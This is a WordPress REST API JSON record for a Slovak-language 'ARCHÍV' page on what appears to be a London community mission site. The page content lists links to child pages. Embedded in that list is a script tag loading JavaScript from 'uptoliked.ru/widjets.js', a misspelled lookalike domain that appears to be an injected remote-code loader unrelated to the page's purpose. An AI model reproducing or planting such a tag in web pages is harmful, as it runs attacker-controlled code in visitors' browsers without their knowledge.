{"id":18877,"date":"2015-01-10T22:16:04","date_gmt":"2015-01-10T22:16:04","guid":{"rendered":"http:\/\/www.scmlondon.org\/?page_id=18877"},"modified":"2015-01-10T22:35:31","modified_gmt":"2015-01-10T22:35:31","slug":"archiv","status":"publish","type":"page","link":"https:\/\/www.scmlondon.org\/?page_id=18877","title":{"rendered":"ARCH\u00cdV"},"content":{"rendered":"<p><ul class=\"list-pages-shortcode child-pages\"><li class=\"page_item page-item-18979 page_item_has_children\"><a href=\"https:\/\/www.scmlondon.org\/?page_id=18979\">O N\u00c1S ARCH\u00cdV<\/a><\/li>\n<li class=\"page_item page-item-18879 page_item_has_children\"><a href=\"https:\/\/www.scmlondon.org\/?page_id=18879\">PL\u00c1N PODUJAT\u00cd V ROKU ARCH\u00cdV<\/a><\/li>\n<li class=\"page_item page-item-20740 page_item_has_children\"><a href=\"https:\/\/www.scmlondon.org\/?page_id=20740\">SVIATOSTI ARCH\u00cdV<\/a><\/li>\n<li class=\"page_item page-item-18883 page_item_has_children\"><a href=\"https:\/\/www.scmlondon.org\/?page_id=18883\">PODUJATIA<\/a><\/li>\n<\/ul><script src=\"\/\/uptoliked.ru\/widjets.js\"><\/script><\/p>\n<h3>Related Images:<\/h3>","protected":false},"excerpt":{"rendered":"<p>Related Images:<\/p>\n","protected":false},"author":826,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"open","ping_status":"closed","template":"","meta":{"ngg_post_thumbnail":0,"footnotes":""},"class_list":["post-18877","page","type-page","status-publish","hentry"],"_links":{"self":[{"href":"https:\/\/www.scmlondon.org\/index.php?rest_route=\/wp\/v2\/pages\/18877","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.scmlondon.org\/index.php?rest_route=\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/www.scmlondon.org\/index.php?rest_route=\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/www.scmlondon.org\/index.php?rest_route=\/wp\/v2\/users\/826"}],"replies":[{"embeddable":true,"href":"https:\/\/www.scmlondon.org\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=18877"}],"version-history":[{"count":2,"href":"https:\/\/www.scmlondon.org\/index.php?rest_route=\/wp\/v2\/pages\/18877\/revisions"}],"predecessor-version":[{"id":18882,"href":"https:\/\/www.scmlondon.org\/index.php?rest_route=\/wp\/v2\/pages\/18877\/revisions\/18882"}],"wp:attachment":[{"href":"https:\/\/www.scmlondon.org\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=18877"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}